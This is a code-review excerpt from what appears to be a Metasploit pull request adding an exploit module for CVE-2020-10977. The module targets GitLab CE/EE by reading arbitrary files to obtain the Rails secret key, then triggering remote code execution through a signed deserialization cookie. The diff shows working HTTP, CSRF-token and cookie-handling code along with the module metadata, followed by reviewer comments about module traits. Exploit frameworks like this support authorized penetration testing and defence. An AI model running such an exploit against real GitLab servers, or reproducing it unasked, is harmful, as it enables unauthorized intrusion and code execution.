modules/exploits/multi/http/gitlab_file_read_rce.rb

```diff
@@ -0,0 +1,537 @@
+
+    def download(project:, path:)
+      res = http_client.send_request_cgi({
+        'method' => 'GET',
+        'uri' => "#{project['path']}/#{path}",
+        'cookie' => cookie
+      })
+
+      if res.nil? || res.body.nil?
+        raise GitLabClientException, 'Empty response. Please validate RHOST'
+      elsif res.code != 200
+        raise GitLabClientException, "Unexpected HTTP #{res.code} response."
+      end
+
+      res.body
+    end
+
+    private
+
+    attr_reader :http_client
+
+    def extract_csrf_token(path:, regex:)
+      res = http_client.send_request_cgi({
+        'method' => 'GET',
+        'uri' => path,
+        'cookie' => cookie
+      })
+
+      if res.nil? || res.body.nil?
+        raise GitLabClientException, 'Empty response. Please validate RHOST'
+      elsif res.code != 200
+        raise GitLabClientException, "Unexpected HTTP #{res.code} response."
+      end
+
+      merge_cookie_jar(res)
+      token = res.body[regex, 1]
+      if token.nil?
+        raise GitLabClientException, "Could not successfully extract CSRF token"
+      end
+      token
+    end
+
+    def cookie
+      return nil if @cookie_jar.empty?
+
+      @cookie_jar.map { |(k, v)| "#{k}=#{v}" }.join(' ')
+    end
+
+    def merge_cookie_jar(res)
+      new_cookies = Hash[res.get_cookies.split(' ').map { |x| x.split('=') }]
+      @cookie_jar.merge!(new_cookies)
+    end
+  end
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Gitlab file read remote code execution',
+        'Description' => %q{
+          This module provides remote code execution against GitLab Community
+          Edition (CE) and Enterprise Edition (EE). It combines an arbitrary file
+          read to extract the Rails "secret_key_base", and gains remote code
+          execution with a deserialization vulnerability of a signed
+          'experimentation_subject_id' cookie that Gitlab uses internally for A/B
+          testing.
+
+          Note that the arbitrary file read exists in GitLab EE/CE 8.5 and later,
+          and was fixed in 12.9.1, 12.8.8, and 12.7.8. However, the RCE only affects
+          versions 12.4.0 and above when the vulnerable `experimentation_subject_id`
+          cookie was introduced.
+
+          Tested on GitLab 12.8.1 and 12.4.0.
+        },
+        'Author' =>
+          [
+            'William Bowling (vakzz)', # Discovery + PoC
+            'alanfoster', # msf module
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['CVE', 'CVE-2020-10977'],
+            ['URL', 'https://hackerone.com/reports/827052'],
+            ['URL', 'https://about.gitlab.com/releases/2020/03/26/security-release-12-dot-9-dot-1-released/']
+          ],
+        'DisclosureDate' => '2020-03-26',
+        'Platform' => 'ruby',
+        'Arch' => ARCH_RUBY,
+        'Privileged' => false,
+        'Targets' => [['Automatic', {}]],
+        'DefaultTarget' => 0
```

Comment:
Add module traits, please!

Reply:
@wvu-r7 Will do! Sorry for the ignorance - would you happen to have a link to any docs/examples for what you'd like here? 👀

Reply:
Something like this:

https://github.com/rapid7/metasploit-framework/blob/2cb2e38c49e8a896032811e5bcb71bbe2ba7297c/modules/exploits/linux/http/saltstack_salt_api_cmd_exec.rb#L73-L77

https://github.com/rapid7/metasploit-framework/blob/2cb2e38c49e8a896032811e5bcb71bbe2ba7297c/lib/msf/core/constants.rb#L54-L101